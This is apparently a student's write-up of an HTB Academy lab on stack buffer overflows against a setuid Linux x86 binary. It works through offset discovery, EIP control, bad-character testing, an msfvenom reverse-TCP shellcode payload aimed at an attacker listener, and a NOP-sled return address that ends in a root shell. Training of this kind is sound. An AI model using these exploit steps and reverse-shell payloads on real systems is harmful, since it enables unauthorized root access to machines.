While attempting a different reverse engineering / pwn challenge, I realized I needed more background knowledge on how to properly do a buffer overflow, thus I took the Stack-Based Buffer Overflows on Linux x86 case from HTB academy. This is my writeup of the final Skills Assessment

Discovery

First we need to see what file we are working with, get some starting addresses, then start debugging to see if we have the ability to overflow into the eip.

htb-student@nixbof32skills:~$ objdump -f leave_msg 
 leave_msg:     file format elf32-i386
 architecture: i386, flags 0x00000150:
 HAS_SYMS, DYNAMIC, D_PAGED
 start address 0x00000550

First, we check to see what file format, architecture and starting address of the file are using objdump -f.

If I try to disassemble with objdump -d, my terminal hangs when hitting the main function. Attempting to run this program either on its own or standalone causes an immediate segmentation fault. I find this a bit odd. I tried resetting the machine but it still does it, so it must be intended.

I found we need to pass a parameter to the program and then it pastes it in /home/htb-student/msg.txt. Each time you run the program, it wipes the file and inserts the new message.

Determining Buffer Overflow Vulnerability

Through some trial and error, I kept sending increasing amounts of \x55 to the program. Between 2000 and 2100 nets us a segmentation fault. We can find the exact offset with some metasploit scripts.

First I use /pattern_create.rb to give us a 2100 byte payload that we know will cause a segmentation fault:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb - l 2100

Next, back in gdb we can paste this in with python:

run $(python -c "print 'Aa0Aa1Aa2Aa3...6Cr7Cr8Cr9'")
...

Program received signal SIGSEGV, Segmentation fault.
0x37714336 in ?? ()

The program errors out and give us a unique hex code thanks to the pattern. Now we use this hexcode with another metasploit tool, pattern_offset.rb to get the exact number of characters needed to reach the eip register:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37714336
[*] Exact match at offset 2060

Taking Control of the `eip`

Voila! We now know it takes 2060 bytes to reach the eip. We can verify this with a special statement:

run $(python -c "print '\x55' * 2060 + '\x66' * 4")
...
Program received signal SIGSEGV, Segmentation fault.
0x66666666 in ?? ()

This statement fills the buffer with \x55 bytes and then fills the eip with \x66. If we run info registers we can see this happening (trimmed for easy reading):

(gdb) info registers
...
 ebx            0x55555555       1431655765
...
 ebp            0x55555555       0x55555555
...
 eip            0x66666666       0x66666666
...

Now we know how to buffer overflow and take control of the eip to point to our own malicious address.

Identify initial payload length

Now we need to generate a payload with msfvenom. I ran uname -a on our machine and we have an Ubuntu x86_64 linux machine.

Now we can craft the payload:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> lport=4444 --platform linux --format c
...
Payload size: 74 bytes
...

This tells us our payload is 74 bytes.

Before we use our payload, we need to identify any bad characters the payload cannot have. We need to do some math to figure out exactly what to craft:

 Buffer = "\x55" * (2064 - 256 - 4) = 1804
  CHARS = "\x00\x01\x02...\xfe\xff" # 256
    EIP = "\x66" * 4'

So our buffer gets 1800 bytes, our character string is 256 bytes, and our eip is 4 bytes.

We will need to set a breakpoint so we can investigate the memory without the program crashing:

(gdb) disas main
Dump of assembler code for function main:
    0x0000073b <+0>:     lea    0x4(%esp),%ecx
    0x0000073f <+4>:     and    $0xfffffff0,%esp
    0x00000742 <+7>:     pushl  -0x4(%ecx)
    0x00000745 <+10>:    push   %ebp
    0x00000746 <+11>:    mov    %esp,%ebp
    0x00000748 <+13>:    push   %esi
    0x00000749 <+14>:    push   %ebx
    0x0000074a <+15>:    push   %ecx
    0x0000074b <+16>:    sub    $0xc,%esp
    0x0000074e <+19>:    call   0x590 <__x86.get_pc_thunk.bx>
    0x00000753 <+24>:    add    $0x1869,%ebx
    0x00000759 <+30>:    mov    %ecx,%esi
    0x0000075b <+32>:    sub    $0x4,%esp
    0x0000075e <+35>:    push   $0x0
    0x00000760 <+37>:    push   $0x0
    0x00000762 <+39>:    push   $0x0
    0x00000764 <+41>:    call   0x4b0 <setresuid@plt>
    0x00000769 <+46>:    add    $0x10,%esp
    0x0000076c <+49>:    mov    0x4(%esi),%eax
    0x0000076f <+52>:    add    $0x4,%eax
    0x00000772 <+55>:    mov    (%eax),%eax
    0x00000774 <+57>:    sub    $0xc,%esp
    0x00000777 <+60>:    push   %eax
    0x00000778 <+61>:    call   0x68d <leavemsg>
    0x0000077d <+66>:    add    $0x10,%esp
    0x00000780 <+69>:    sub    $0xc,%esp
    0x00000783 <+72>:    lea    -0x175c(%ebx),%eax
    0x00000789 <+78>:    push   %eax
    0x0000078a <+79>:    call   0x4f0 <outs@plt>
    0x0000078f <+84>:    add    $0x10,%esp
    0x00000792 <+87>:    mov    $0x0,%eax
    0x00000797 <+92>:    lea    -0xc(%ebp),%esp
    0x0000079a <+95>:    pop    %ecx
    0x0000079b <+96>:    pop    %ebx
    0x0000079c <+97>:    pop    %esi
    0x0000079d <+98>:    pop    %ebp
    0x0000079e <+99>:    lea    -0x4(%ecx),%esp
    0x000007a1 <+102>:   ret

The best breakpoint would be at 0x778 where it makes the call to the actual leavemsg function. We can run break leavemsg to break on the function name.

Now We use this information to craft our actual testing payload:

(gdb) run $(python -c 'print "\x55" * (2064 - 256 - 4) + "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

Once we hit enter, it will pretty immediately hit the breakpoint for our function. Now is the time to examine the memory.

We can do so using x/2000xb $esp+750. The important part of this step is to find any chars that have been skipped and record them so msfvenom does not use them in its payload.

Here is what I found:

\x00\x09\x0a\x20

We can pass this in as a string for the option --bad-chars so msfvenom will avoid them:

Generate final payload

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.x.x lport=4444 --bad-chars="\x00\x09\x0a\x20" --platform linux --format c
...
Payload size: 95 bytes
...

Now we need to take the payload output and combine it into one big string.

With our string, we need to do one last math problem for final buffer and NOPs size:

    Buffer = "\x55" * (2064 - 100 - 95 - 4) = 790
      NOPs = "\x90" * 100
 Shellcode = "\xbd\x95\xf6...\x02\xce" #95
       EIP = "\x66" * 4'

And use this in the run $(python -c 'print ...') command.

Find address for payload

Our code will hit the breakpoint again. Now we need to find a line or two in the NOPs before our shellcode appears and use that memory address in the eip. Our shell code starts with 0x48 0x31 ... and will be the first bytes after the sequence of `0x90` bytes.

Our shellcode starts at 0xffffd73a. I'm going to set the eip a bit earlier at 0xffffd72a. This machine will need the bytes in little endian format, so the eip will be "\x2a\xd7\xff\xff".

Execute final payload

We replace the "\x66" * 4 in our run command with this new address. Finally let's boot a new terminal with nc -lvnp 4444 so the connection can complete. This binary has root privileges with the suid set, so if we connect to it from gdb, it will run as the user gdb is running as.

So instead of doing another (gdb) run command, quit gdb and in the main shell run:

./leave_msg $(python -c 'print "\x55" * (2064 - 124 - 95 - 4) + "\x90" * 124 + "<payload>" + "\x3a\xd7\xff\xff"')

Our nc listener lights up, and whoami tells us we are root! Let's grab that flag int /root/flag.txt